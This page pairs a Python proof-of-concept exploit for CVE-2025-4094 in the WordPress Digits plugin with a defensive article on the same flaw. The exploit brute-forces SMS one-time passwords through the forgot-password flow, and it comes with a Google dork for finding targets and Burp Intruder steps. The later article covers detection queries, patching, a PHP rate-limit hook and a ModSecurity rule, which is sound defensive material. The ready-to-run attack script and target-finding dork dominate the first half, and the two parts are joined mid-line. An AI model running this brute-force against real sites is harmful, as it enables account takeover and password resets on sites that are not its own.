WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Google Dork: inurl:/wp-content/plugins/digits/
# Date: 2025-04-30
# Exploit Author: Saleh Tarawneh
# Vendor Homepage: https://digits.unitedover.com/
# Version: < 8.4.6.1
# CVE : CVE-2025-4094
"""
The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
CWE-287: Improper Authentication
CVSS v3.1: 9.8 (Critical)
OWASP A2: Broken Authentication
[Instructions]
1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request.
2. Copy the exact request parameters
3. Replace the placeholder values in the script with real data from the intercepted request.
4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
[Alternative Method – Burp Suite Pro]
If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
1. Intercept the OTP request using Burp Proxy.
2. Send the request to Intruder.
3. Mark the `sms_otp` parameter as the payload position.
4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
5. Start the attack and monitor responses for a different status code, length, or success message.
"""
import requests
def brute(otp):
url = "https://example.com/wp-admin/admin-ajax.php"
data = { # Replace with targets data
"login_digt_countrycode": "+",
"digits_phone": "000000000",
"action_type": "phone",
"sms_otp": otp,
"otp_step_1": "1",
"instance_id": "xxxxxxx",
"action": "digits_forms_ajax",
"type": "forgot",
"forgot_pass_method": "sms_otp",
"digits": "1",
"digits_redirect_page": "//example.com/",
"digits_form": "xxxxxxxx",
"_wp_http_referer": "/?login=true"
}
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://example.com/?login=true" # Replace with intercepted referer
}
response = requests.post(url, data=data, headers=headers)
if '"success":true' in response.text:
print(f"[+] OTP FOUND: {otp}")
exit()
def main():
for otp in range(0, 10000): # range(0, 1000000): for 6-digit
otp_str = f"{otp:04d}" # {otp:06d} for 6-digit
print(f"[*] Trying OTP: {otp_str}")
brute(otp_str)
if __name__ == "__main__":
main()WordPress Digits Plugin (pre‑8.4.6.1) — CVE‑2025‑4094: OTP Brute‑Force / Authentication Bypass (Analysis & Mitigation)
This article explains the authentication bypass vulnerability assigned CVE‑2025‑4094 that affected versions of the Digits WordPress plugin prior to 8.4.6.1. It focuses on what went wrong, realistic impact, detection techniques, and robust mitigation strategies for operators and incident responders. The content emphasizes defensive controls and safe remediation rather than offensive exploitation details.
Summary & metadata
| Item | Value |
|---|---|
| Vulnerability | OTP verification lacks rate limiting → brute‑force of one‑time codes |
| CVE | CVE‑2025‑4094 |
| Affected Versions | Digits WordPress plugin < 8.4.6.1 |
| CWE | CWE‑287: Improper Authentication |
| CVSS v3.1 | 9.8 (Critical) |
| OWASP | A2: Broken Authentication |
High‑level description
The Digits plugin provided an OTP (one‑time password) flow for registration and password recovery. In affected versions the OTP verification endpoint did not enforce effective rate limits, progressive throttling, or adequate per‑account/IP controls. An attacker could therefore repeatedly submit candidate OTP values until a valid one was found, allowing account takeover or forced password resets.
Why this is serious
- OTP flows are used for password recovery and account registration — if they can be guessed they become a direct vector to take over accounts.
- SMS‑based recovery often ties to high‑privilege accounts (administrators, store owners) or to accounts with access to sensitive data.
- Lack of rate limiting makes automated attacks feasible at scale from a single host or distributed botnet.
How an incident might look (non‑exploit description)
Attackers will typically submit many OTP verification attempts for a given target identifier (phone number or email). Successful abuse results in credential reset or session establishment for the targeted account. Defenders should watch for large numbers of OTP submissions, unusual success rates, and geographically distributed requests against the same account identifier.
Indicators of compromise (IoCs) and detection techniques
- Elevated counts of POST requests to authentication/OTP endpoints (e.g., admin‑ajax.php or plugin endpoint) within short time windows.
- Many failed OTP verification responses followed by a single success for the same account identifier.
- High error patterns from a single IP or long tail of different IPs targeting the same identifier (probable distributed brute‑force).
- Unusual account password change or session creation immediately after OTP success.
Sample detection searches
Below are example queries you can adapt for your SIEM. They are intentionally generic; adjust field names to your environment.
// Elasticsearch / Kibana (KQL) example
http.request.method:POST and
http.request.uri.path:/wp-admin/admin-ajax.php and
http.request.body:("action" AND "digits")
| stats count() by client.ip, request.body.identifier, response.status_code
| where count() > 50 and response.status_code == 200Explanation: This KQL-like search looks for a large number of POSTs to a likely plugin AJAX endpoint grouped by client IP and target identifier; thresholds and field names must be customized to your logging pipeline.
// Splunk example (pseudo‑search)
index=web sourcetype=apache:access "admin-ajax.php" action=digits
| stats count by clientip, target_identifier
| where count > 100Explanation: The Splunk example groups requests by source IP and target identifier; an unusually high count suggests brute‑force activity. Tune the “where” threshold for normal traffic baselines.
Immediate remediation (prioritized)
- Apply vendor patch: Upgrade Digits to version 8.4.6.1 or later. This is the fastest, most reliable fix.
- Temporary mitigations if you cannot patch immediately:
- Enable web application firewall (WAF) rules to throttle or block repeated OTP attempts.
- Enforce CAPTCHA on OTP request/verification endpoints.
- Increase logging and alerting for OTP verification activity (per‑identifier and per‑IP thresholds).
- Disable SMS‑based password resets if a more secure recovery option is available.
- Reset sessions: For suspected compromised accounts, force password resets and invalidate active sessions.
Longer‑term hardening recommendations
- Implement per‑identifier and per‑IP rate limits for OTP verification (small attempt window, e.g., 5 attempts per 15 minutes by default).
- Use progressive delays or exponential backoff on repeated failures rather than immediate hard lockouts that can lead to DoS via account lockout.
- Require multi-factor or out‑of‑band verification for high‑privilege actions (administrative changes, payment methods).
- Increase OTP complexity: longer length and/or alphanumeric codes, but balance UX and SMS constraints.
- Shorten OTP TTL (time to live) — typical windows are 2–10 minutes depending on channel.
- Ensure OTPs are single‑use and invalidated on reset, and store only cryptographic hashes of OTPs server‑side.
- Integrate anomaly detection: block or escalate when verification attempts come from TOR/proxy IPs, known bad ASNs, or from improbable geography.
Example defensive code: rate limiting an OTP verification endpoint in WordPress
/**
* Simple per‑identifier rate limiting using WordPress transients.
* Add to a site‑specific plugin or mu‑plugin.
*/add_action('wp_ajax_nopriv_digits_verify_otp', 'my_digits_rate_limit');
function my_digits_rate_limit() {
// Extract identifier safely (phone/email) — sanitize input!
$identifier = isset($_POST['identifier']) ? sanitize_text_field($_POST['identifier']) : '';
if (! $identifier) {
wp_send_json_error(['message' => 'Missing identifier'], 400);
}
// Compose transient key per identifier and for the client IP
$ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
$key_id = 'otp_attempts_id_' . md5($identifier);
$key_ip = 'otp_attempts_ip_' . md5($ip);
$limit_id = 5; // attempts per identifier
$limit_ip = 100; // attempts per IP per hour
$window = HOUR_IN_SECONDS;
$attempts_id = (int) get_transient($key_id);
$attempts_ip = (int) get_transient($key_ip);
if ($attempts_id >= $limit_id || $attempts_ip >= $limit_ip) {
wp_send_json_error(['message' => 'Too many attempts. Try again later.'], 429);
}
// Increment counters with expiration window
set_transient($key_id, $attempts_id + 1, $window);
set_transient($key_ip, $attempts_ip + 1, $window);
// Allow request to continue to the plugin’s verification logic
}Explanation: This code hooks a custom action that runs before or around the plugin's OTP verification handler. It uses WordPress transients to track attempt counts per account identifier and per IP, enforcing basic thresholds and returning an HTTP 429 error if limits are exceeded. Adjust thresholds and hook names to match the actual plugin endpoints and ensure the code executes prior to verification.
Example WAF rule (conceptual)
# ModSecurity (conceptual)
SecRule REQUEST_URI "@contains /admin-ajax.php" "chain,phase:2,deny,log,msg:'OTP brute-force rate limit exceeded'"
SecRule &REQUEST_HEADERS:Content-Type "@gt 0" "chain"
SecRule REQUEST_BODY "@contains action=digits_forms_ajax" "chain"
SecRule IP:OTP_REQUEST_COUNT "@gt 200" "setvar:IP.OTP_BLOCK=1,expirevar:IP.OTP_REQUEST_COUNT=3600"Explanation: The rule pattern demonstrates a WAF approach: detect repeated requests to an OTP endpoint and increment per‑IP counters. Once the counter exceeds a threshold, the WAF can block or throttle that IP. Implementations must be tuned to avoid false positives and to integrate with your WAF's variable storage semantics.
Secure OTP design checklist
- Minimum length and sufficient entropy (e.g., 6 digits or better alphanumeric tokens for higher security).
- Short validity window (minutes) and single‑use enforcement.
- Server stores only hashed OTPs, not plaintext.
- Rate limiting per identifier, per IP, and global rate limiting for endpoint.
- CAPTCHA on the initial request to obtain an OTP (not just verification) to raise the cost for automated harvesters.
- Out‑of‑band confirmation or secondary MFA for sensitive account changes.
Incident response guidance
- If you suspect exploitation, immediately upgrade the plugin to the patched version and revoke active authentication tokens for affected accounts.
- Search logs for the indicators described above to identify affected accounts and the timeline of events.
- Notify impacted users and require password resets where compromise is confirmed or suspected.
- Consider enabling 2FA for all administrative users and revoking API keys that may have been exposed.
- Document the incident and adjust monitoring thresholds to detect similar attempts in the future.
Responsible disclosure & vendor action
Site operators should prioritize applying the official patch from the plugin vendor. If a site owner discovers a previously unknown bypass or residual weakness after patching, report it through the vendor’s security contact or a coordinated disclosure channel. Maintain records of the timeline, affected accounts, and remediation steps for compliance and insurance purposes.
Conclusion
OTP mechanisms are a valuable part of account security when implemented correctly. The CVE‑2025‑4094 case highlights that OTP endpoints require robust rate limiting, single‑use tokens, logging, and anomaly detection. The strongest immediate corrective action is to apply the vendor patch; secondary mitigations such as WAF rules, CAPTCHAs and additional monitoring reduce exposure while upgrades are scheduled.